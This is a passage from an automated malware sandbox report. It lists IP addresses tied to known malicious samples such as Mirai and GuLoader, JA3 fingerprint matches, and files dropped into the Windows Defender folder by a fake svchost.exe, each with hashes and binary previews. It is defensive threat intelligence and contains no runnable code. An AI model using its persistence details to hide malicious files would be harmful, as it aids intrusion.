                                                                                                                                                                                                            https://www.google.com/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=rqjkphmdlmFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ftao.bb/RTupG#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                            • 23.22.158.217
                                                                                                                                                                                                            sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                            • 54.133.106.71
                                                                                                                                                                                                            CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 106.15.232.163
                                                                                                                                                                                                            sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                            • 120.79.48.98
                                                                                                                                                                                                            sora.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                            • 8.188.166.167
                                                                                                                                                                                                            mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 47.93.221.102
                                                                                                                                                                                                            C6y77dS3l7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 118.31.219.198
                                                                                                                                                                                                            Wiu8X6685m.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 118.31.219.198
                                                                                                                                                                                                            WUa1Tm8Dlv.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 118.31.219.198
                                                                                                                                                                                                            yakuza.arm4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 47.126.44.187
                                                                                                                                                                                                            botnet.sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                            • 47.112.29.92
                                                                                                                                                                                                            botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                            • 139.251.190.28

                                                                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            37f463bf4616ecd445d4a1937da06e197DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 99.83.170.3
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            11315781264#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                            • 99.83.170.3
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            P52mX04112024145925383.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                            • 99.83.170.3
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            Factura Honorarios 2024-11-04.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                            • 99.83.170.3
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            CERTIFICADO TITULARIDAD.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                            • 99.83.170.3
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            Anfrage.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                            • 99.83.170.3
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                            • 99.83.170.3
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            Request for Quotation 11-11-2024#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                            • 99.83.170.3
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            074c592b-5cc0-496d-b3fa-45a09d4363ce#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                            • 99.83.170.3
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            rPO3799039985.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                            • 99.83.170.3
                                                                                                                                                                                                            • 188.114.96.3

                                                                                                                                                                                                            Dropped Files

                                                                                                                                                                                                            No context

                                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                                            C:\Program Files (x86)\Windows Defender\galynuh.com

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):593
                                                                                                                                                                                                            Entropy (8bit):7.626935561277827
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:NXnYWSLEmM3e7/EzZUimtdHCD6B+HAwQ0m7xs01O58/fTU6i0rSZd09LQ:FYWSLdM3CENUJtd85IsWO58NGd09k
                                                                                                                                                                                                            MD5:926512864979BC27CF187F1DE3F57AFF
                                                                                                                                                                                                            SHA1:ACDEB9D6187932613C7FA08EAF28F0CD8116F4B5
                                                                                                                                                                                                            SHA-256:B3E893A653EC06C05EE90F2F6E98CC052A92F6616D7CCA8C416420E178DCC73F
                                                                                                                                                                                                            SHA-512:F6F9FD3CA9305BEC879CFCD38E64111A18E65E30D25C49E9F2CD546CBAB9B2DCD03ECA81952F6B77C0EAAB20192EF7BEF0D8D434F6F371811929E75F8620633B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:....tp.-$|e.V...(.m.y;.;..>...O`.<.]..&@...0..P....:.(...{i1r....H...i......=$.<.v&1...%e..r..(}b;.U...A.f..K8S.9IM.R.....!.._.....N':.. ..s..!IX..ZK..q..T..v.%.....0...fn.........b...../...\..O8....M...i.ZF.r.C.)~qO..T..{...x..g.......$.t.m;..|.R.33...; ...N.#..rN.A.c.D.w.?0.%D.i..1...5..[.,......ir.Z.`.....+.8..Y.....'>./l..qZ..#1F..F...=./,.&.....e.Q..$.mZZAZ........P...=T.u.H]^n|..h_s.n....r..I..U.T..%N$.B..jj.\..*...Z.';-.....5...#..u.P..k...\..:.'..l8n<C.s.SJ..4....%OE.L2..Ir....U...d.CP....m<.TG?.u..iLj*....H.H...?G..*O..tE..9..%.<+<......_.w..*S....

                                                                                                                                                                                                            C:\Program Files (x86)\Windows Defender\galyqaz.com

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):43438
                                                                                                                                                                                                            Entropy (8bit):7.990138823807318
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:768:A6eLDU7W3WFK7FdCDxeqiLQf3UmXYoxwHoLB019/avO5Y8ZfJtPYo37b1SG/Qw9:AD33bBMDxehg3Hx44e1ZavODAGRN/j
                                                                                                                                                                                                            MD5:667D4C31668E9D495B8066E696FE77DC
                                                                                                                                                                                                            SHA1:AFBBE4C5D77A504827FB5D976D7D0A8F7A151382
                                                                                                                                                                                                            SHA-256:5FEA80C0353FF42DE2F6EDEC4CA00CF80B012B9B9A3760EAA5540B4C4A2BEC2F
                                                                                                                                                                                                            SHA-512:93A826C8F5745E59ACA0C0F890FC34EDDB54602A070D89D80A889406780A1A468F92EFCF3534FD0FB29AC22B123F517F8351AB8211BDDA8739F9709280BC2EF4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:...[..A.9l....A.D.[;.b..DD...}..n.o.zL......._O....r.:...%m8s...o..e....;+.q.o`3...%"..P.(}h1.H.;....%...$).|...Y.V...:..B..X..Tsa...-.P+..?........8...R..w.q.....qV.O.+.......d.....7.Z.N..V-........i.Y..s.G./pe^......M..7..+..NI.\..l.1.d...`U..zc...7 ....!.7d.Z....Q.y.)u.o..'].v...;.....m......ah...?.......1W.Q....+<..<..|^..fT.G....t..91.*.....~V..Oq.).. ..W...3...C...iE. ^...f&..+.#.'....w.._...I...k.k.L[.:.....f.+.Y.'9wE..5.(...$.&p...V>E...s.'...m;jpJ..R....:J...f.O..c.YJ8....L...4.X.....k#.dEw..... .j}..f..A........*..IU...=..5;.c.wx}@..k..R..i.L%L....e.}.#.l1...{..x.q..9s.f'b\;...X....b.X..A:.....y.w.&.+.{.j....n.JlP&$.7.....0........B.U.r.!@.G.,.:.c.>..IOx.:..^....".v..g;...-.u...."..$....+..k......aT..`op......*.............l..+)..y.Z`.........E...M..'w..%.9...G..7R...R.7:uG...|d....X..h...e...A".....O.). v....$Q....5.....;..*lU...L.....l.M.M8..4G.SkK.........q..3O...6..]..j.........y..59uC.Y'... :.c.h..b"1q. .....bk.(..

                                                                                                                                                                                                            C:\Program Files (x86)\Windows Defender\pupydeq.com

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):114
                                                                                                                                                                                                            Entropy (8bit):6.479691220248167
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:elfPZkATGqaNh/bf4/o/flD2qNJ5ZmANv:elfhkVNh/L4kl2qNJ5ZmAx
                                                                                                                                                                                                            MD5:BFDE1E9E9C32C1681A16139450C6909D
                                                                                                                                                                                                            SHA1:7E669B927E6A75A10A0CA29E38E58DDCB49B725E
                                                                                                                                                                                                            SHA-256:E0D020BA1CB6506CEE234903A44C747EE0CFA7E2D1E60029E4CD8DE9A431512A
                                                                                                                                                                                                            SHA-512:781FD54F155442DD34F9919B3CD063EE399DB411BBFE15F2BDC43D3AB8AC2D04E1011B2C99FAB42BEBF7B903A94E09AAAEF71B7A465D2D04B417F6DAD8E8E396
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:...[..A.9l.....|.e.&'.*.-K...P-.p.R...9L....%........'.=...bto2..X...f.....@pg.>..ac...69..z...}/<.MF9...h..

                                                                                                                                                                                                            C:\Program Files (x86)\Windows Defender\puzylyp.com

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):59521
                                                                                                                                                                                                            Entropy (8bit):7.972553484293753
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:ZQimNJq4lkHqWmHwEyivDfOoG5tN06d+1N:ZRukFmHy4rG5tUN
                                                                                                                                                                                                            MD5:7365A373028EAAA65DB162DD1ED58552
                                                                                                                                                                                                            SHA1:A2825E9438DBF853961F5B50F46686D56B873BF9
                                                                                                                                                                                                            SHA-256:6B29D2C9CA65EEDD45C86273EA34ECE6B04D5B5CFCB90F23509A5ED9EA7ECFB0
                                                                                                                                                                                                            SHA-512:68C7D894D8BCF767F2519047354CD4DA2A90BE276CEED80DCAD560CDAE6B68C630D418133CBF64D7BF2F25E3BFB501DFBAC1D87CA4C905C5ECCCBFDCC1496E84
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:...[..A.9l.....|.e.8w.!..1....j..r.^..r.....'..>....=.s.$$71...I...i.....==.7.rg~..j#.`S..y0,F..%....c...Kr).#FB...B...........H<*../.. ..>.Y......:X..G..4.j....{W.A. ........*.....6.P.Q..[).\.T...z.PK.n.P.2, ..CG..,...q..c....S.}.f..K..8...y=..+*...S.b..cAMN.a.U.q.c3.9^.hD.+..'.....-.....(t...|.....(.$.......`<..n..|A..7.W..W...u..(eX&....C8....(.'..V..O.......F...:ET;^.B..(.N*.:.a....n..........'A:..Q.!j..J.m.=.^.-=-.....*..>..bvF..K.H....8.9...g?=+..D.....9@...'ON.G'.J./....P..x.UGRWH.{8...u......jY(h..7..V.......i(..|...,..|;.e.+<;...l..I..,.Kf^....$.&.$.|7....h..6Rn..+z.~/4W(......f.P..R6.....[a.~.h.+.u.[...sO.(Fzy.;.....<...A..@..N...<. ..Z... .g.+....p.(........#....r6.. Eo....3......jIg}.....z_..)'+....p............P?..h1..x.Nk.....M...Z.......0+.Yf.+.O.M..&V...X.fofX...wt.L#.R..h...z.....,../......m'..dsn\........V..4Eq....w....7.M.~ ...d.]ij.........1..\.....:.+y..).........O.,..v..C.EH.C.cI.3.:...7=PM.6.....C .d..

                                                                                                                                                                                                            C:\Program Files (x86)\Windows Defender\qexyhuv.com

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):114
                                                                                                                                                                                                            Entropy (8bit):6.479691220248167
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:elfPZkATGqaNh/bf4/o/flD2qNJ5ZmANv:elfhkVNh/L4kl2qNJ5ZmAx
                                                                                                                                                                                                            MD5:BFDE1E9E9C32C1681A16139450C6909D
                                                                                                                                                                                                            SHA1:7E669B927E6A75A10A0CA29E38E58DDCB49B725E
                                                                                                                                                                                                            SHA-256:E0D020BA1CB6506CEE234903A44C747EE0CFA7E2D1E60029E4CD8DE9A431512A
                                                                                                                                                                                                            SHA-512:781FD54F155442DD34F9919B3CD063EE399DB411BBFE15F2BDC43D3AB8AC2D04E1011B2C99FAB42BEBF7B903A94E09AAAEF71B7A465D2D04B417F6DAD8E8E396
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:...[..A.9l.....|.e.&'.*.-K...P-.p.R...9L....%........'.=...bto2..X...f.....@pg.>..ac...69..z...}/<.MF9...h..

                                                                                                                                                                                                            C:\Program Files (x86)\Windows Defender\vofycot.com

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):25028
                                                                                                                                                                                                            Entropy (8bit):7.979704330440142
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:f4ak8nl3r9Htb7pEFRtxSjjWk5rSV4Z8tPzh3XCV5:AJElb9HMRtxQjWKW4S8P
                                                                                                                                                                                                            MD5:830ADF6D8C5F44C1BEDCEE9C9E97D80F
                                                                                                                                                                                                            SHA1:09291626EB3F99ED57CED05B717E47B2820842BC
                                                                                                                                                                                                            SHA-256:1339C0557393D518631E8D31BF2C8D2F29CBCB0A50B5F64B6251570FEC107281
                                                                                                                                                                                                            SHA-512:10D469D47B472D8EF3B945BFBC8E94E0471B19A2C19102D2DCAC4CF249618508AD9BF2A8E02BEBD94736804052C8E4E396DFCED20AC78674E4730813DF2AEF12
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:...[..A.9l.....|.e.8w.!..1.....9.:....".....=..9.......z...}yE.....j...I.....<.&.3.l6g...q...d^.X.K6.g`a..;.F.2Sdo.}8..U.g;...H.L.....A.....y.....v.[..K'..."..r..Z2r.....%g.)-#.....;6.~.....j...G..K..J..l....SI.&.K.i.$wIV.C;..^5..n.SS...'.>...#.r..l;.=.^ ..`r..Y.p..c....p.D.l.n .)..%..l...p.....a......h...e....g.<.......;). ?..zI..kW.......&.. :.>.....tW..j:.".........T...M... X.;.TB.'s.^vC>.:.....=..R..VZ..%.k..].>w..O.;.a.R.!-<.....$...$..f4...G.C..R.w.....dyn:....BD..aZ...v.G.C#...l......w.TW.RO.k<.KA.....'./d.. ....H......am.J*...|..d|..|.9 6...x......0.Ww.....l.h.j.m-...~..+.#..v{.*!r.=..^....{.M..H....<?.v.1.h.b.x......n+V#Jo-.6..D._-...SZ....I...~.o..I...;.u.*....n.+.......+FA..mc....:Im.S..8..>....d.Id......zK..qtqH...;..........Z..V/..e9..r..Qw.....k\......M.f#.Xi.D.M....t....RWf&hV...in.Lk...=....x....l.........m&..A(t.............dGs....`....).A.w}..I6..=p.........r..R......s.!%C.;........z...[.Z.....Z.e..).(...#/.G.c......Z(.c..

                                                                                                                                                                                                            C:\Program Files (x86)\Windows Defender\vojyqem.com

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1094
                                                                                                                                                                                                            Entropy (8bit):7.846100825403509
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:IZsdS4WMBLdxezuQj1kZ8l9KfPqiHv8jckTXRUubBZU:QsSixez1Rg8ydkTXRdBZU
                                                                                                                                                                                                            MD5:CDD419FBE9A78B58D570A9342163D049
                                                                                                                                                                                                            SHA1:F9103E5FDE55D1DFC797623FE6819E03A3348268
                                                                                                                                                                                                            SHA-256:9CCA975CF3E340C1394774C17D54DD875C0DF69EB79CE8DBF97A343614CAA180
                                                                                                                                                                                                            SHA-512:493FC46ABC8A6C34E4A233EAA3FDE6660FFB4A4CD7725392F708EE0CE1F6A70FFB89E0BE72EAE2F6EF401BC8B13440E7CD3CB41DC8DD9E3BA0609C09A4A604AD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:...{:.a)9l.....(.|.t;....>....V>.%.B...........%$......P...J^X*..q....z...<.%...U<e..U9.y".[.F7..r5....=.;ZO..*./.......%....}..~:...3;.s...s/2../....2.f..F%H.....uJ.".e.....-.....,....U....L../..~...S$.%.TXC. evx.....t0..e.z=...P....(.r..`..~...}t...0l...D.).Ju.X..c.B.|.lv....5h.:...}...."..R.|g...?.....).2A......op.,8..{Z..7..O.....i..-7.:....[`Q..Pb.(.....L......L...5]W&X...s6..B_s.n......r..._.EZ...m.a._..+>.FO...9.G./u;G..\.`.....7.v..g g./.._.`...H.\.".;x2#..Uj..U.g.c..-@.....O...9..+gn..~y.Asx.>......^..w..+.J.....8!.WaO.0Q.xk..e.1<6...s..[...=.Rv..@...b.i.-.mp....+..x.#..p~.4D(.!.......r..y.B6.....p.c.b.+.e.L....!.E/N;3.x...P=........R..... ..X.-..s. .&.._6z....^......'.p..|...:.2.)....2.....>tp.....SP..Q*M....."..........\...;...j.9>.6..;R*..|........|.N>.,...K.. s...U9}<g....p5..).B..W...f..S...1.[...J....ohU..........#..lk]...v....|...^L..!^..0@.........$.........R.rGY.{.........O4..Y.[2....Q.c..;..... Z.C.`.......=.c..

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ByPjYYbfxzaUlbcW_da99c7945a829c8387bd231f0ba6e2c8843dcb1_ed34fbdf_2b886f11-1bfb-4d69-b0bb-5e6e469ad0dc\Report.wer

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                            Entropy (8bit):0.9657982617679941
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:dJWlTL7z83BU/ct7jPczuiF0Y4IO8Iq1:dpBU/wjPczuiF0Y4IO8
                                                                                                                                                                                                            MD5:65EA0CD894A6DE4E8888A263359670B7
                                                                                                                                                                                                            SHA1:328F9507AE487EC48E9D805335D75AC5D788153E
                                                                                                                                                                                                            SHA-256:F2E924A5FAEB36435A4D14402978EBE70D27C3E98CF212FFA33C88E8CE4E2ADA
                                                                                                                                                                                                            SHA-512:CA9DF61B632DA74EC511299FE485C8AD0A0091BD10FBD00EEDE162A0ECABAEA510EB0AB8FED998A9F35A15379F98F01A126B8C3777D5E9D112AEADDFD2DE820B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.8.4.9.3.8.2.0.6.1.5.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.8.4.9.4.7.1.1.2.5.5.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.b.8.8.6.f.1.1.-.1.b.f.b.-.4.d.6.9.-.b.0.b.b.-.5.e.6.e.4.6.9.a.d.0.d.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.f.5.c.3.1.f.c.-.b.a.a.7.-.4.8.f.4.-.a.a.1.3.-.1.5.e.a.3.7.5.7.8.7.7.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.y.P.j.Y.Y.b.f.x.z.a.U.l.b.c.W.o.K.U.I.r.n.l.Z.i.Y.H.b...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.a.0.-.0.0.0.1.-.0.0.1.4.-.b.a.4.9.-.b.a.3.0.5.c.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.4.0.c.2.1.3.9.0.9.3.c.c.3.5.6.d.6.d.e.0.c.3.f.b.1.2.7.4.1.b.6.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.B.y.P.j.Y.Y.b.

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ByPjYYbfxzaUlbcW_da99c7945a829c8387bd231f0ba6e2c8843dcb1_ed34fbdf_4f986c67-41e4-42ae-b414-883c95d19c6a\Report.wer

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                            Entropy (8bit):1.026989092237025
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:lAgtle8L7l880BU/ct7jRJkfTzuiF0Z24IO8Iq1:VtlTL7l83BU/ct7jPCzuiF0Y4IO8Iq1
                                                                                                                                                                                                            MD5:26673F9286C8FFD3546AAF94312F47C6
                                                                                                                                                                                                            SHA1:9B00D1F800AEE2D7270BD66B205E1F6A6FDC3DC4
                                                                                                                                                                                                            SHA-256:AD255965F63CE9DDA320B2115C23680FDE16085042264AD000128D99CFC6017A
                                                                                                                                                                                                            SHA-512:64E3794F5C5750C88DBE8E9C0307524F173B9355E1ECCCD2109420ECC91A6073461D52F9EA4C5A0C23E8FC5E4EBE0DC3DCF52B3C90CFAF80BEFCDD38EA565109
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.8.5.0.2.9.2.6.5.5.4.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.8.5.0.5.6.1.4.0.3.6.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.f.9.8.6.c.6.7.-.4.1.e.4.-.4.2.a.e.-.b.4.1.4.-.8.8.3.c.9.5.d.1.9.c.6.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.d.9.f.3.b.7.6.-.2.e.a.0.-.4.1.f.6.-.8.0.4.8.-.1.e.f.f.5.5.6.3.a.c.5.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.y.P.j.Y.Y.b.f.x.z.a.U.l.b.c.W.o.K.U.I.r.n.l.Z.i.Y.H.b...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.d.c.-.0.0.0.1.-.0.0.1.4.-.1.8.4.2.-.a.a.3.0.5.c.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.4.0.c.2.1.3.9.0.9.3.c.c.3.5.6.d.6.d.e.0.c.3.f.b.1.2.7.4.1.b.6.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.B.y.P.j.Y.Y.b.

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ByPjYYbfxzaUlbcW_da99c7945a829c8387bd231f0ba6e2c8843dcb1_ed34fbdf_61b85db3-780c-498c-bbdc-7ec4113862a3\Report.wer

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                            Entropy (8bit):1.027175717950961
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:LE8lTL7583BU/ct7jPKzuiF0Y4IO8Iq1:IHBU/wjPKzuiF0Y4IO8
                                                                                                                                                                                                            MD5:8FBD729F355CC0B581D5E28AAF83096C
                                                                                                                                                                                                            SHA1:3513CD7C4A9FD363E867F3ED21F8D6E61CF654A1
                                                                                                                                                                                                            SHA-256:83AC8F808E0143697E1D0B8D767E54FDD94407663207D985F2135D69839B3CE9
                                                                                                                                                                                                            SHA-512:4BBCCFF6A89519600B1965A33FBF427EF3DF9F84DD05AC02E0BEF19E33FA39C0A265CF123418BDB52C8E532890EFBD3D57EC7789D4663DE95564D14BAC3282D4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.8.5.0.5.0.8.9.3.8.3.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.8.5.0.8.0.5.8.1.4.8.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.1.b.8.5.d.b.3.-.7.8.0.c.-.4.9.8.c.-.b.b.d.c.-.7.e.c.4.1.1.3.8.6.2.a.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.a.0.7.7.c.a.6.-.f.0.6.5.-.4.4.8.9.-.8.b.9.d.-.e.f.d.2.b.4.7.3.7.a.c.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.y.P.j.Y.Y.b.f.x.z.a.U.l.b.c.W.o.K.U.I.r.n.l.Z.i.Y.H.b...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.7.1.4.-.0.0.0.1.-.0.0.1.4.-.0.e.4.1.-.a.7.3.0.5.c.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.4.0.c.2.1.3.9.0.9.3.c.c.3.5.6.d.6.d.e.0.c.3.f.b.1.2.7.4.1.b.6.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.B.y.P.j.Y.Y.b.

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ByPjYYbfxzaUlbcW_da99c7945a829c8387bd231f0ba6e2c8843dcb1_ed34fbdf_9a373f22-3123-4e24-ba2a-8bf5631b32b6\Report.wer

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                            Entropy (8bit):1.0139283543167261
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:ovdle8L7P880BU/ct7jRJkGzuiF0Z24IO8Iq1:ydlTL7P83BU/ct7jPfzuiF0Y4IO8Iq1
                                                                                                                                                                                                            MD5:72764B6F0DD49396C52FE4DB58BC5CCA
                                                                                                                                                                                                            SHA1:017B06C1F5A34547A5ABA9BDFDDF3F2442CCF4CA
                                                                                                                                                                                                            SHA-256:5D0318ECB9467867B36A1CEC514EE885B01CE2FBDECD6DD9D5C086A503774B62
